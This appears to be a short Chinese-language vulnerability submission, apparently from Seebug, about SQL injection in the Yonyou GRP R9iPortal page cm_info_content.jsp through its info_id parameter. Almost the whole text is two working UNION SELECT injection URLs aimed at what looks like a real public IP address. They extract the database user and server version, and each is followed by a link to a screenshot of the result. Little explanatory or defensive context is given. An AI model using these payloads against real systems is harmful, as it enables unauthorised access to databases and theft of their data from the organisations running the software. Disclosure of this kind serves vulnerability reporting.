# 用友GRP系统sql注射
## /R9iPortal/cm/cm_info_content.jsp 参数 info_id
```
http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=-8431%20UNION%20ALL%20SELECT%2067,67,user,67,67,67,67,67,67,67,67,67,67,67--
```
![](https://images.seebug.org/contribute/fa52e29c-0b6a-4154-8fd8-2e57d1598c20-user.png)
```
http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=-8431%20UNION%20ALL%20SELECT%2067,67,@@version,67,67,67,67,67,67,67,67,67,67,67--
```
![](https://images.seebug.org/contribute/9c39c86c-fc65-4f72-aa9a-2c5982eb7451-SERVER.png)
暂无评论